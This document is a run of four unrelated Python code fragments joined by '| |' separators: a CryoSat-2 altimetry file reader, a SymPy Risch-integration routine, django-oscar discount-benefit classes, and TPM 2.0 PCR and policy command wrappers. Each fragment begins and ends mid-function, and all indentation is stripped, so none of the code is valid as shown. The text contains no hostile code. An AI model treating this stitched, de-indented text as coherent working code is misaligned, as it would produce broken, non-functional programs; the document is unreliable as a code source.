# SIR2SIC21B: Level-1 CAL2 SARin Mode (Rx1 Channel)
# SIR1LRM_0M: LRM and TRK Monitoring Data from Rx 1 Channel
# SIR2LRM_0M: LRM and TRK Monitoring Data from Rx 2 Channel
# SIR1SAR_0M: SAR Monitoring Data from Rx 1 Channel
# SIR2SAR_0M: SAR Monitoring Data from Rx 1 Channel
# SIR_SIN_0M: SARIN Monitoring Data
# SIR_SIC40M: CAL4 Monitoring Data
regex_products = ('SIR1SAR_FR|SIR2SAR_FR|SIR_SIN_FR|SIR_LRM_1B|SIR_FDM_1B|'
'SIR_SAR_1B|SIR_SIN_1B|SIR1LRC11B|SIR2LRC11B|SIR1SAC11B|SIR2SAC11B|'
'SIR_SIC11B|SIR_SICC1B|SIR1SAC21B|SIR2SAC21B|SIR1SIC21B|SIR2SIC21B|'
'SIR1LRM_0M|SIR2LRM_0M|SIR1SAR_0M|SIR2SAR_0M|SIR_SIN_0M|SIR_SIC40M')
# CRYOSAT LEVEL-1b PRODUCTS NAMING RULES
# Mission Identifier
# File Class
# File Product
# Validity Start Date and Time
# Validity Stop Date and Time
# Baseline Identifier
# Version Number
regex_pattern = r'(.*?)_({0})_({1})_(\d+T?\d+)_(\d+T?\d+)_(.*?)(\d+)'
rx = re.compile(regex_pattern.format(regex_class,regex_products),re.VERBOSE)
# extract file information from filename
MI,CLASS,PRODUCT,START,STOP,BASELINE,VERSION=rx.findall(fileBasename).pop()
print(full_filename) if verbose else None
# get dataset MODE from PRODUCT portion of file name
self.MODE = re.findall(r'(LRM|FDM|SAR|SIN)', PRODUCT).pop()
# read level-2 CryoSat-2 data from netCDF4 file
CS_L1b_mds = self.cryosat_baseline_D(full_filename, unpack=unpack)
# calculate GPS time of CryoSat data (seconds since Jan 6, 1980 00:00:00)
# from TAI time since Jan 1, 2000 00:00:00
GPS_Time = self.calc_GPS_time(CS_L1b_mds['Location']['Day'],
CS_L1b_mds['Location']['Second'], CS_L1b_mds['Location']['Micsec'])
# leap seconds for converting from GPS time to UTC time
leap_seconds = self.count_leap_seconds(GPS_Time)
# calculate dates as J2000 days (UTC)
CS_L1b_mds['Location']['days_J2k'] = (GPS_Time - leap_seconds)/86400.0 - 7300.0
# parameters to extract
if field_dict is None:
field_dict = self.__default_field_dict__()
# extract fields of interest using field dict keys
for group,variables in field_dict.items():
for field in variables:
if field not in self.fields:
self.fields.append(field)
setattr(self, field, CS_L1b_mds[group][field])
# update size and shape of input data
self.__update_size_and_shape__()
# return the data and header text
return self
def calc_GPS_time(self, day, second, micsec):
"""
Calculate the GPS time (seconds since Jan 6, 1980 00:00:00)
"""
# TAI time is ahead of GPS by 19 seconds
return (day + 7300.0)*86400.0 + second.astype('f') + micsec/1e6 - 19
def count_leap_seconds(self, GPS_Time):
"""
Count number of leap seconds that have passed for given GPS times
"""
# GPS times for leap seconds
leaps = [46828800, 78364801, 109900802, 173059203, 252028804, 315187205,
346723206, 393984007, 425520008, 457056009, 504489610, 551750411,
599184012, 820108813, 914803214, 1025136015, 1119744016, 1167264017]
# number of leap seconds prior to GPS_Time
n_leaps = np.zeros_like(GPS_Time)
for i,leap in enumerate(leaps):
count = np.count_nonzero(GPS_Time >= leap)
if (count > 0):
i_records,i_blocks = np.nonzero(GPS_Time >= leap)
n_leaps[i_records,i_blocks] += 1.0
return n_leaps
def read_MPH(self, full_filename):
"""
Read ASCII Main Product Header (MPH) block from an ESA PDS file
"""
# read input data file
with open(os.path.expanduser(full_filename), 'rb') as fid:
file_contents = fid.read().splitlines()
# Define constant values associated with PDS file formats
# number of text lines in standard MPH
n_MPH_lines = 41
# check that first line of header matches PRODUCT
if not bool(re.match(br'PRODUCT\=\"(.*)(?=\")',file_contents[0])):
raise IOError('File does not start with a valid PDS MPH')
# read MPH header text
s_MPH_fields = {}
for i in range(n_MPH_lines):
# use regular expression operators to read headers
if bool(re.match(br'(.*?)\=\"(.*)(?=\")',file_contents[i])):
# data fields within quotes
field,value=re.findall(br'(.*?)\=\"(.*)(?=\")',file_contents[i]).pop()
s_MPH_fields[field.decode('utf-8')] = value.decode('utf-8').rstrip()
elif bool(re.match(br'(.*?)\=(.*)',file_contents[i])):
# data fields without quotes
field,value=re.findall(br'(.*?)\=(.*)',file_contents[i]).pop()
s_MPH_fields[field.decode('utf-8')] = value.decode('utf-8').rstrip()
# Return block name array to calling function
return s_MPH_fields
def read_SPH(self, full_filename, j_sph_size):
"""
Read ASCII Specific Product Header (SPH) block from a PDS file
"""
# read input data file
with open(os.path.expanduser(full_filename), 'rb') as fid:
file_contents = fid.read().splitlines()
# Define constant values associated with PDS file formats
# number of text lines in standard MPH
n_MPH_lines = 41
# compile regular expression operator for reading headers
rx = re.compile(br'(.*?)\=\"?(.*)',re.VERBOSE)
# check first line of header matches SPH_DESCRIPTOR
if not bool(re.match(br'SPH\_DESCRIPTOR\=',file_contents[n_MPH_lines+1])):
raise IOError('File does not have a valid PDS DSD')
# read SPH header text (no binary control characters)
s_SPH_lines = [li for li in file_contents[n_MPH_lines+1:] if rx.match(li)
and not re.search(br'[^\x20-\x7e]+',li)]
# extract SPH header text
s_SPH_fields = {}
c = 0
while (c < len(s_SPH_lines)):
# check if line is within DS_NAME portion of SPH header
if bool(re.match(br'DS_NAME',s_SPH_lines[c])):
# add dictionary for DS_NAME
field,value=re.findall(br'(.*?)\=\"(.*)(?=\")',s_SPH_lines[c]).pop()
key = value.decode('utf-8').rstrip()
s_SPH_fields[key] = {}
for line in s_SPH_lines[c+1:c+7]:
if bool(re.match(br'(.*?)\=\"(.*)(?=\")',line)):
# data fields within quotes
dsfield,dsvalue=re.findall(br'(.*?)\=\"(.*)(?=\")',line).pop()
s_SPH_fields[key][dsfield.decode('utf-8')] = dsvalue.decode('utf-8').rstrip()
elif bool(re.match(br'(.*?)\=(.*)',line)):
# data fields without quotes
dsfield,dsvalue=re.findall(br'(.*?)\=(.*)',line).pop()
s_SPH_fields[key][dsfield.decode('utf-8')] = dsvalue.decode('utf-8').rstrip()
# add 6 to counter to go to next entry
c += 6
# use regular expression operators to read headers
elif bool(re.match(br'(.*?)\=\"(.*)(?=\")',s_SPH_lines[c])):
# data fields within quotes
field,value=re.findall(br'(.*?)\=\"(.*)(?=\")',s_SPH_lines[c]).pop()
s_SPH_fields[field.decode('utf-8')] = value.decode('utf-8').rstrip()
elif bool(re.match(br'(.*?)\=(.*)',s_SPH_lines[c])):
# data fields without quotes
field,value=re.findall(br'(.*?)\=(.*)',s_SPH_lines[c]).pop()
s_SPH_fields[field.decode('utf-8')] = value.decode('utf-8').rstrip()
# add 1 to counter to go to next line
c += 1
# Return block name array to calling function
return s_SPH_fields
def read_DSD(self, full_filename, DS_TYPE=None):
"""
Read ASCII Data Set Descriptors (DSD) block from a PDS file
"""
# read input data file
with open(os.path.expanduser(full_filename), 'rb') as fid:
file_contents = fid.read().splitlines()
# Define constant values associated with PDS file formats
# number of text lines in standard MPH
n_MPH_lines = 41
# number of text lines in a DSD header
n_DSD_lines = 8
# Level-1b CryoSat DS_NAMES within files
regex_patterns = []
if (DS_TYPE == 'CS_L1B'):
regex_patterns.append(br'DS_NAME\="SIR_L1B_LRM[\s+]*"')
regex_patterns.append(br'DS_NAME\="SIR_L1B_SAR[\s+]*"')
regex_patterns.append(br'DS_NAME\="SIR_L1B_SARIN[\s+]*"')
elif (DS_TYPE == 'SIR_L1B_FDM'):
regex_patterns.append(br'DS_NAME\="SIR_L1B_FDM[\s+]*"')
# find the DSD starting line within the SPH header
c = 0
Flag = False
while ((Flag is False) and (c < len(regex_patterns))):
# find indice within
indice = [i for i,line in enumerate(file_contents[n_MPH_lines+1:]) if
re.search(regex_patterns[c],line)]
if indice:
Flag = True
else:
c+=1
# check that valid indice was found within header
if not indice:
raise IOError('Can not find correct DSD field')
# extract s_DSD_fields info
DSD_START = n_MPH_lines + indice[0] + 1
s_DSD_fields = {}
for i in range(DSD_START,DSD_START+n_DSD_lines):
# use regular expression operators to read headers
if bool(re.match(br'(.*?)\=\"(.*)(?=\")',file_contents[i])):
# data fields within quotes
field,value=re.findall(br'(.*?)\=\"(.*)(?=\")',file_contents[i]).pop()
s_DSD_fields[field.decode('utf-8')] = value.decode('utf-8').rstrip()
elif bool(re.match(br'(.*?)\=(.*)',file_contents[i])):
# data fields without quotes
field,value=re.findall(br'(.*?)\=(.*)',file_contents[i]).pop()
s_DSD_fields[field.decode('utf-8')] = value.decode('utf-8').rstrip()
# Return block name array to calling function
return s_DSD_fields
def cryosat_baseline_AB(self, fid, n_records):
"""
Read L1b MDS variables for CryoSat Baselines A and B
"""
n_SARIN_RW = 512
n_SAR_RW = 128
n_LRM_RW = 128
n_blocks = 20
n_BeamBehaviourParams = 50
| |
result, const)
def is_log_deriv_k_t_radical(fa, fd, DE, Df=True):
r"""
Checks if Df is the logarithmic derivative of a k(t)-radical.
b in k(t) can be written as the logarithmic derivative of a k(t) radical if
there exist n in ZZ and u in k(t) with n, u != 0 such that n*b == Du/u.
Either returns (ans, u, n, const) or None, which means that Df cannot be
written as the logarithmic derivative of a k(t)-radical. ans is a list of
tuples such that Mul(*[i**j for i, j in ans]) == u. This is useful for
seeing exactly what elements of k(t) produce u.
This function uses the structure theorem approach, which says that for any
f in K, Df is the logarithmic derivative of a K-radical if and only if there
are ri in QQ such that::
--- --- Dt
\ r * Dt + \ r * i
/ i i / i --- = Df.
--- --- t
i in L i in E i
K/C(x) K/C(x)
Where C = Const(K), L_K/C(x) = { i in {1, ..., n} such that t_i is
transcendental over C(x)(t_1, ..., t_i-1) and Dt_i = Da_i/a_i, for some a_i
in C(x)(t_1, ..., t_i-1)* } (i.e., the set of all indices of logarithmic
monomials of K over C(x)), and E_K/C(x) = { i in {1, ..., n} such that t_i
is transcendental over C(x)(t_1, ..., t_i-1) and Dt_i/t_i = Da_i, for some
a_i in C(x)(t_1, ..., t_i-1) } (i.e., the set of all indices of
hyperexponential monomials of K over C(x)). If K is an elementary extension
over C(x), then the cardinality of L_K/C(x) U E_K/C(x) is exactly the
transcendence degree of K over C(x). Furthermore, because Const_D(K) ==
Const_D(C(x)) == C, deg(Dt_i) == 1 when t_i is in E_K/C(x) and
deg(Dt_i) == 0 when t_i is in L_K/C(x), implying in particular that E_K/C(x)
and L_K/C(x) are disjoint.
The sets L_K/C(x) and E_K/C(x) must, by their nature, be computed
recursively using this same function. Therefore, it is required to pass
them as indices to D (or T). L_args are the arguments of the logarithms
indexed by L_K (i.e., if i is in L_K, then T[i] == log(L_args[i])). This is
needed to compute the final answer u such that n*f == Du/u.
exp(f) will be the same as u up to a multiplicative constant. This is
because they will both behave the same as monomials. For example, both
exp(x) and exp(x + 1) == E*exp(x) satisfy Dt == t. Therefore, the term const
is returned. const is such that exp(const)*f == u. This is calculated by
subtracting the arguments of one exponential from the other. Therefore, it
is necessary to pass the arguments of the exponential terms in E_args.
To handle the case where we are given Df, not f, use
is_log_deriv_k_t_radical_in_field().
See also
========
is_log_deriv_k_t_radical_in_field, is_deriv_k
"""
H = []
if Df:
dfa, dfd = (fd*derivation(fa, DE) - fa*derivation(fd, DE)).cancel(fd**2,
include=True)
else:
dfa, dfd = fa, fd
# Our assumption here is that each monomial is recursively transcendental
if len(DE.exts) != len(DE.D):
if [i for i in DE.cases if i == 'tan'] or \
(set([i for i in DE.cases if i == 'primitive']) -
set(DE.indices('log'))):
raise NotImplementedError("Real version of the structure "
"theorems with hypertangent support is not yet implemented.")
# TODO: What should really be done in this case?
raise NotImplementedError("Nonelementary extensions not supported "
"in the structure theorems.")
E_part = [DE.D[i].quo(Poly(DE.T[i], DE.T[i])).as_expr() for i in DE.indices('exp')]
L_part = [DE.D[i].as_expr() for i in DE.indices('log')]
lhs = Matrix([E_part + L_part])
rhs = Matrix([dfa.as_expr()/dfd.as_expr()])
A, u = constant_system(lhs, rhs, DE)
if not all(derivation(i, DE, basic=True).is_zero for i in u) or not A:
# If the elements of u are not all constant
# Note: See comment in constant_system
# Also note: derivation(basic=True) calls cancel()
return None
else:
if not all(i.is_Rational for i in u):
# TODO: But maybe we can tell if they're not rational, like
# log(2)/log(3). Also, there should be an option to continue
# anyway, even if the result might potentially be wrong.
raise NotImplementedError("Cannot work with non-rational "
"coefficients in this case.")
else:
n = reduce(ilcm, [i.as_numer_denom()[1] for i in u])
u *= n
terms = ([DE.T[i] for i in DE.indices('exp')] +
[DE.extargs[i] for i in DE.indices('log')])
ans = list(zip(terms, u))
result = Mul(*[Pow(i, j) for i, j in ans])
# exp(f) will be the same as result up to a multiplicative
# constant. We now find the log of that constant.
argterms = ([DE.extargs[i] for i in DE.indices('exp')] +
[DE.T[i] for i in DE.indices('log')])
const = cancel(fa.as_expr()/fd.as_expr() -
Add(*[Mul(i, j/n) for i, j in zip(argterms, u)]))
return (ans, result, n, const)
def is_log_deriv_k_t_radical_in_field(fa, fd, DE, case='auto', z=None):
"""
Checks if f can be written as the logarithmic derivative of a k(t)-radical.
It differs from is_log_deriv_k_t_radical(fa, fd, DE, Df=False)
for any given fa, fd, DE in that it finds the solution in the
given field not in some (possibly unspecified extension) and
"in_field" with the function name is used to indicate that.
f in k(t) can be written as the logarithmic derivative of a k(t) radical if
there exist n in ZZ and u in k(t) with n, u != 0 such that n*f == Du/u.
Either returns (n, u) or None, which means that f cannot be written as the
logarithmic derivative of a k(t)-radical.
case is one of {'primitive', 'exp', 'tan', 'auto'} for the primitive,
hyperexponential, and hypertangent cases, respectively. If case is 'auto',
it will attempt to determine the type of the derivation automatically.
See also
========
is_log_deriv_k_t_radical, is_deriv_k
"""
fa, fd = fa.cancel(fd, include=True)
# f must be simple
n, s = splitfactor(fd, DE)
if not s.is_one:
pass
z = z or Dummy('z')
H, b = residue_reduce(fa, fd, DE, z=z)
if not b:
# I will have to verify, but I believe that the answer should be
# None in this case. This should never happen for the
# functions given when solving the parametric logarithmic
# derivative problem when integration elementary functions (see
# Bronstein's book, page 255), so most likely this indicates a bug.
return None
roots = [(i, i.real_roots()) for i, _ in H]
if not all(len(j) == i.degree() and all(k.is_Rational for k in j) for
i, j in roots):
# If f is the logarithmic derivative of a k(t)-radical, then all the
# roots of the resultant must be rational numbers.
return None
# [(a, i), ...], where i*log(a) is a term in the log-part of the integral
# of f
respolys, residues = list(zip(*roots)) or [[], []]
# Note: this might be empty, but everything below should work find in that
# case (it should be the same as if it were [[1, 1]])
residueterms = [(H[j][1].subs(z, i), i) for j in range(len(H)) for
i in residues[j]]
# TODO: finish writing this and write tests
p = cancel(fa.as_expr()/fd.as_expr() - residue_reduce_derivation(H, DE, z))
p = p.as_poly(DE.t)
if p is None:
# f - Dg will be in k[t] if f is the logarithmic derivative of a k(t)-radical
return None
if p.degree(DE.t) >= max(1, DE.d.degree(DE.t)):
return None
if case == 'auto':
case = DE.case
if case == 'exp':
wa, wd = derivation(DE.t, DE).cancel(Poly(DE.t, DE.t), include=True)
with DecrementLevel(DE):
pa, pd = frac_in(p, DE.t, cancel=True)
wa, wd = frac_in((wa, wd), DE.t)
A = parametric_log_deriv(pa, pd, wa, wd, DE)
if A is None:
return None
n, e, u = A
u *= DE.t**e
elif case == 'primitive':
with DecrementLevel(DE):
pa, pd = frac_in(p, DE.t)
A = is_log_deriv_k_t_radical_in_field(pa, pd, DE, case='auto')
if A is None:
return None
n, u = A
elif case == 'base':
# TODO: we can use more efficient residue reduction from ratint()
if not fd.is_sqf or fa.degree() >= fd.degree():
# f is the logarithmic derivative in | |
<filename>server/src/oscarbluelight/offer/benefits.py<gh_stars>1-10
from decimal import Decimal as D
from django.core import exceptions
from django.db import models
from django.utils.translation import gettext_lazy as _
from oscar.core.loading import get_model, get_class
from oscar.apps.offer import utils
from oscar.apps.offer.benefits import (
PercentageDiscountBenefit,
AbsoluteDiscountBenefit,
FixedPriceBenefit,
MultibuyDiscountBenefit,
ShippingBenefit,
ShippingAbsoluteDiscountBenefit,
ShippingFixedPriceBenefit,
ShippingPercentageDiscountBenefit,
)
from oscar.templatetags.currency_filters import currency
import copy
Benefit = get_model("offer", "Benefit")
BasketDiscount = get_class("offer.results", "BasketDiscount")
PostOrderAction = get_class("offer.results", "PostOrderAction")
ZERO_DISCOUNT = get_class("offer.results", "ZERO_DISCOUNT")
class BluelightPercentageDiscountBenefit(PercentageDiscountBenefit):
"""
An offer benefit that gives a percentage discount
"""
_description = _("%(value)s%% discount on %(range)s, %(max_affected_items)s")
class Meta:
app_label = "offer"
proxy = True
verbose_name = _("Percentage discount benefit")
verbose_name_plural = _("Percentage discount benefits")
@property
def name(self):
return self._append_max_discount_to_text(
self._description
% {
"value": self.value,
"range": self.range.name if self.range else _("product range"),
"max_affected_items": (
_("maximum %s item(s)") % self.max_affected_items
)
if self.max_affected_items
else _("no maximum"),
}
)
@property
def description(self):
return self._append_max_discount_to_text(
self._description
% {
"value": self.value,
"range": utils.range_anchor(self.range)
if self.range
else _("product range"),
"max_affected_items": (
_("maximum %s item(s)") % self.max_affected_items
)
if self.max_affected_items
else _("no maximum"),
}
)
def _clean(self):
if not self.range:
raise exceptions.ValidationError(
_("Percentage benefits require a product range")
)
if not self.value or self.value <= 0 or self.value > 100:
raise exceptions.ValidationError(
_("Percentage discount requires a value between 0 and 100")
)
def apply(
self,
basket,
condition,
offer,
discount_percent=None,
max_total_discount=None,
consume_items=None,
):
self._clean()
if discount_percent is None:
discount_percent = self.value
discount_amount_available = self._get_max_discount_amount(max_total_discount)
line_tuples = self.get_applicable_lines(offer, basket)
discount_percent = min(discount_percent, D("100.0"))
discount = D("0.00")
affected_items = 0
max_affected_items = self._effective_max_affected_items()
affected_lines = []
for price, line in line_tuples:
if affected_items >= max_affected_items:
break
if discount_amount_available == 0:
break
quantity_affected = min(
line.quantity_without_discount, max_affected_items - affected_items
)
if quantity_affected <= 0:
continue
line_discount = self.round(
discount_percent / D("100.0") * price * int(quantity_affected),
currency=basket.currency,
)
if discount_amount_available is not None:
line_discount = min(line_discount, discount_amount_available)
discount_amount_available -= line_discount
if line_discount > 0:
line.discount(
line_discount, quantity_affected, incl_tax=False, offer=offer
)
affected_lines.append((line, line_discount, quantity_affected))
affected_items += quantity_affected
discount += line_discount
if discount > 0:
if consume_items:
consume_items(offer, basket, affected_lines)
else:
condition.consume_items(offer, basket, affected_lines)
return BasketDiscount(discount)
class BluelightAbsoluteDiscountBenefit(AbsoluteDiscountBenefit):
"""
An offer benefit that gives an absolute discount
"""
_description = _("%(value)s discount on %(range)s, %(max_affected_items)s")
class Meta:
app_label = "offer"
proxy = True
verbose_name = _("Absolute discount benefit")
verbose_name_plural = _("Absolute discount benefits")
@property
def name(self):
return self._append_max_discount_to_text(
self._description
% {
"value": currency(self.value),
"range": self.range.name.lower() if self.range else _("product range"),
"max_affected_items": (
_("maximum %s item(s)") % self.max_affected_items
)
if self.max_affected_items
else _("no maximum"),
}
)
@property
def description(self):
return self._append_max_discount_to_text(
self._description
% {
"value": currency(self.value),
"range": utils.range_anchor(self.range)
if self.range
else _("product range"),
"max_affected_items": (
_("maximum %s item(s)") % self.max_affected_items
)
if self.max_affected_items
else _("no maximum"),
}
)
def _clean(self):
if not self.range:
raise exceptions.ValidationError(
_("Fixed discount benefits require a product range")
)
if not self.value:
raise exceptions.ValidationError(
_("Fixed discount benefits require a value")
)
def apply(
self,
basket,
condition,
offer,
discount_amount=None,
max_total_discount=None,
consume_items=None,
):
self._clean()
if discount_amount is None:
discount_amount = self.value
# Fetch basket lines that are in the range and available to be used in
# an offer.
line_tuples = self.get_applicable_lines(offer, basket)
# Determine which lines can have the discount applied to them
max_affected_items = self._effective_max_affected_items()
num_affected_items = 0
affected_items_total = D("0.00")
lines_to_discount = []
for price, line in line_tuples:
if num_affected_items >= max_affected_items:
break
qty = min(
line.quantity_without_discount, max_affected_items - num_affected_items
)
lines_to_discount.append((line, price, qty))
num_affected_items += qty
affected_items_total += qty * price
# Ensure we don't try to apply a discount larger than the total of the
# matching items.
discount = min(discount_amount, affected_items_total)
discount_amount_available = self._get_max_discount_amount(max_total_discount)
if discount_amount_available is not None:
discount = min(discount, discount_amount_available)
if discount == 0:
return ZERO_DISCOUNT
# Apply discount equally amongst them
affected_lines = []
applied_discount = D("0.00")
for i, (line, price, qty) in enumerate(lines_to_discount):
if i == len(lines_to_discount) - 1:
# If last line, then take the delta as the discount to ensure
# the total discount is correct and doesn't mismatch due to
# rounding.
line_discount = discount - applied_discount
else:
# Calculate a weighted discount for the line
line_discount = self.round(
((price * qty) / affected_items_total) * discount,
currency=basket.currency,
)
if line_discount > 0:
line.discount(line_discount, qty, incl_tax=False, offer=offer)
affected_lines.append((line, line_discount, qty))
applied_discount += line_discount
if consume_items:
consume_items(offer, basket, affected_lines)
else:
condition.consume_items(offer, basket, affected_lines)
return BasketDiscount(discount)
class BluelightFixedPriceBenefit(FixedPriceBenefit):
"""
An offer benefit that gives the items in the range for a fixed price.
Oscar's default FixedPriceBenefit is unintuitive. It ignores the benefit range and
the max_affected_items and uses the products affected by the condition instead. This
changes the behavior to more closely follow how other benefits work. It applied, it
gives the basket items in the benefit range for a fixed price, not the basket items
in the condition range. It also respects the max_affected_items setting.
"""
_description = _(
"The products in the range are sold for %(amount)s, %(max_affected_items)s"
)
class Meta:
app_label = "offer"
proxy = True
verbose_name = _("Fixed price benefit")
verbose_name_plural = _("Fixed price benefits")
@property
def name(self):
return self._append_max_discount_to_text(
self._description
% {
"amount": currency(self.value),
"max_affected_items": (
_("maximum %s item(s)") % self.max_affected_items
)
if self.max_affected_items
else _("no maximum"),
}
)
def _clean(self):
if not self.range:
raise exceptions.ValidationError(
_("Fixed price benefits require a product range.")
)
def apply(
self, basket, condition, offer, max_total_discount=None, consume_items=None
):
self._clean()
# Fetch basket lines that are in the range and available to be used in an offer.
line_tuples = self.get_applicable_lines(offer, basket)
if not line_tuples:
return ZERO_DISCOUNT
# Sort from most-expensive to least-expensive
line_tuples = line_tuples[::-1]
# Determine the lines to consume
num_permitted = self._effective_max_affected_items()
num_affected = 0
value_affected = D("0.00")
covered_lines = []
for price, line in line_tuples:
quantity_affected = min(
line.quantity_without_discount, (num_permitted - num_affected)
)
num_affected += quantity_affected
value_affected += quantity_affected * price
covered_lines.append((price, line, quantity_affected))
if num_affected >= num_permitted:
break
discount = max(value_affected - self.value, D("0.00"))
discount_amount_available = self._get_max_discount_amount(max_total_discount)
discount = min(discount, discount_amount_available)
if not discount:
return ZERO_DISCOUNT
# Apply discount to the affected lines
discount_applied = D("0.00")
last_line = covered_lines[-1][1]
for price, line, quantity in covered_lines:
if line == last_line:
# If last line, we just take the difference to ensure that
# rounding doesn't lead to an off-by-one error
line_discount = discount - discount_applied
else:
line_discount = self.round(
discount * (price * quantity) / value_affected,
currency=basket.currency,
)
if line_discount > 0:
line.discount(line_discount, quantity, incl_tax=False, offer=offer)
discount_applied += line_discount
return BasketDiscount(discount)
class BluelightFixedPricePerItemBenefit(FixedPriceBenefit):
"""
An offer benefit that gives the items in the range for a fixed price.
Oscar's default FixedPriceBenefit is unintuitive. It ignores the benefit range and
the max_affected_items and uses the products affected by the condition instead. This
changes the behavior to more closely follow how other benefits work. It applied, it
gives the basket items in the benefit range for a fixed price, not the basket items
in the condition range. It also respects the max_affected_items setting.
"""
_description = _(
"The products in the range are sold for %(amount)s each; %(max_affected_items)s"
)
class Meta:
app_label = "offer"
proxy = True
verbose_name = _("Fixed price per item benefit")
verbose_name_plural = _("Fixed price per item benefits")
@property
def name(self):
return self._append_max_discount_to_text(
self._description
% {
"amount": currency(self.value),
"max_affected_items": (
_("maximum %s item(s)") % self.max_affected_items
)
if self.max_affected_items
else _("no maximum"),
}
)
def _clean(self):
if not self.range:
raise exceptions.ValidationError(
_("Fixed price per item benefits require a product range.")
)
def apply(
self, basket, condition, offer, max_total_discount=None, consume_items=None
):
self._clean()
# Fetch basket lines that are in the range and available to be used in an offer.
line_tuples = self.get_applicable_lines(offer, basket)
if not line_tuples:
return ZERO_DISCOUNT
# Sort from most-expensive to least-expensive
line_tuples = line_tuples[::-1]
# Determine the lines to consume
num_permitted = self._effective_max_affected_items()
num_affected = 0
covered_lines = []
for price, line in line_tuples:
if price <= self.value:
continue
quantity_affected = min(
line.quantity_without_discount, (num_permitted - num_affected)
)
if quantity_affected <= 0:
continue
num_affected += quantity_affected
covered_lines.append((price, line, quantity_affected))
if num_affected >= num_permitted:
break
if len(covered_lines) <= 0:
return ZERO_DISCOUNT
# Apply discount to the affected lines
discount_amount_available = | |
This command is used to cause an update to the indicated PCR.
Args:
pcrHandle (TPM_HANDLE): Handle of the PCR
Auth Handle: 1
Auth Role: USER
eventData (int): Event data in sized buffer
Returns:
digests - Table 80 shows the basic hash-agile structure used in this
specification. To handle hash agility, this structure uses
the hashAlg parameter to indicate the algorithm used to
compute the digest and, by implication, the size of the digest.
"""
req = TPM2_PCR_Event_REQUEST(pcrHandle, eventData)
respBuf = self.dispatchCommand(TPM_CC.PCR_Event, req)
res = self.processResponse(respBuf, PCR_EventResponse)
return res.digests if res else None
# PCR_Event()
def PCR_Read(self, pcrSelectionIn):
""" This command returns the values of all PCR specified in pcrSelectionIn.
Args:
pcrSelectionIn (TPMS_PCR_SELECTION): The selection of PCR to read
Returns:
pcrUpdateCounter - The current value of the PCR update counter
pcrSelectionOut - The PCR in the returned list
pcrValues - The contents of the PCR indicated in pcrSelectOut-˃
pcrSelection[] as tagged digests
"""
req = TPM2_PCR_Read_REQUEST(pcrSelectionIn)
respBuf = self.dispatchCommand(TPM_CC.PCR_Read, req)
return self.processResponse(respBuf, PCR_ReadResponse)
# PCR_Read()
def PCR_Allocate(self, authHandle, pcrAllocation):
""" This command is used to set the desired PCR allocation of PCR and
algorithms. This command requires Platform Authorization.
Args:
authHandle (TPM_HANDLE): TPM_RH_PLATFORM+{PP}
Auth Index: 1
Auth Role: USER
pcrAllocation (TPMS_PCR_SELECTION): The requested allocation
Returns:
allocationSuccess - YES if the allocation succeeded
maxPCR - Maximum number of PCR that may be in a bank
sizeNeeded - Number of octets required to satisfy the request
sizeAvailable - Number of octets available. Computed before the allocation.
"""
req = TPM2_PCR_Allocate_REQUEST(authHandle, pcrAllocation)
respBuf = self.dispatchCommand(TPM_CC.PCR_Allocate, req)
return self.processResponse(respBuf, PCR_AllocateResponse)
# PCR_Allocate()
def PCR_SetAuthPolicy(self, authHandle, authPolicy, hashAlg, pcrNum):
""" This command is used to associate a policy with a PCR or group of
PCR. The policy determines the conditions under which a PCR may be
extended or reset.
Args:
authHandle (TPM_HANDLE): TPM_RH_PLATFORM+{PP}
Auth Index: 1
Auth Role: USER
authPolicy (int): The desired authPolicy
hashAlg (TPM_ALG_ID): The hash algorithm of the policy
pcrNum (TPM_HANDLE): The PCR for which the policy is to be set
"""
req = TPM2_PCR_SetAuthPolicy_REQUEST(authHandle, authPolicy, hashAlg, pcrNum)
respBuf = self.dispatchCommand(TPM_CC.PCR_SetAuthPolicy, req)
return self.processResponse(respBuf)
# PCR_SetAuthPolicy()
def PCR_SetAuthValue(self, pcrHandle, auth):
""" This command changes the authValue of a PCR or group of PCR.
Args:
pcrHandle (TPM_HANDLE): Handle for a PCR that may have an
authorization value set
Auth Index: 1
Auth Role: USER
auth (int): The desired authorization value
"""
req = TPM2_PCR_SetAuthValue_REQUEST(pcrHandle, auth)
respBuf = self.dispatchCommand(TPM_CC.PCR_SetAuthValue, req)
return self.processResponse(respBuf)
# PCR_SetAuthValue()
def PCR_Reset(self, pcrHandle):
""" If the attribute of a PCR allows the PCR to be reset and proper
authorization is provided, then this command may be used to set the PCR
in all banks to zero. The attributes of the PCR may restrict the
locality that can perform the reset operation.
Args:
pcrHandle (TPM_HANDLE): The PCR to reset
Auth Index: 1
Auth Role: USER
"""
req = TPM2_PCR_Reset_REQUEST(pcrHandle)
respBuf = self.dispatchCommand(TPM_CC.PCR_Reset, req)
return self.processResponse(respBuf)
# PCR_Reset()
def PolicySigned(self, authObject, policySession, nonceTPM, cpHashA, policyRef, expiration, auth):
""" This command includes a signed authorization in a policy. The
command ties the policy to a signing key by including the Name of the
signing key in the policyDigest
Args:
authObject (TPM_HANDLE): Handle for a key that will validate the signature
Auth Index: None
policySession (TPM_HANDLE): Handle for the policy session being extended
Auth Index: None
nonceTPM (int): The policy nonce for the session
This can be the Empty Buffer.
cpHashA (int): Digest of the command parameters to which this
authorization is limited
This is not the cpHash for this command but the cpHash for the
command to which this policy session will be applied. If it is
not limited, the parameter will be the Empty Buffer.
policyRef (int): A reference to a policy relating to the
authorization may be the Empty Buffer
Size is limited to be no larger than the nonce size supported on
the TPM.
expiration (int): Time when authorization will expire, measured in
seconds from the time that nonceTPM was generated
If expiration is non-negative, a NULL Ticket is returned. See 23.2.5.
auth (TPMU_SIGNATURE): Signed authorization (not optional)
(One of [TPMS_SIGNATURE_RSASSA, TPMS_SIGNATURE_RSAPSS,
TPMS_SIGNATURE_ECDSA, TPMS_SIGNATURE_ECDAA, TPMS_SIGNATURE_SM2,
TPMS_SIGNATURE_ECSCHNORR, TPMT_HA, TPMS_SCHEME_HASH,
TPMS_NULL_SIGNATURE])
Returns:
timeout - Implementation-specific time value, used to indicate to
the TPM when the ticket expires
NOTE If policyTicket is a NULL Ticket, then this shall be
the Empty Buffer.
policyTicket - Produced if the command succeeds and expiration in
the command was non-zero; this ticket will use the
TPMT_ST_AUTH_SIGNED structure tag. See 23.2.5
"""
req = TPM2_PolicySigned_REQUEST(authObject, policySession, nonceTPM, cpHashA, policyRef, expiration, auth)
respBuf = self.dispatchCommand(TPM_CC.PolicySigned, req)
return self.processResponse(respBuf, PolicySignedResponse)
# PolicySigned()
def PolicySecret(self, authHandle, policySession, nonceTPM, cpHashA, policyRef, expiration):
""" This command includes a secret-based authorization to a policy. The
caller proves knowledge of the secret value using an authorization
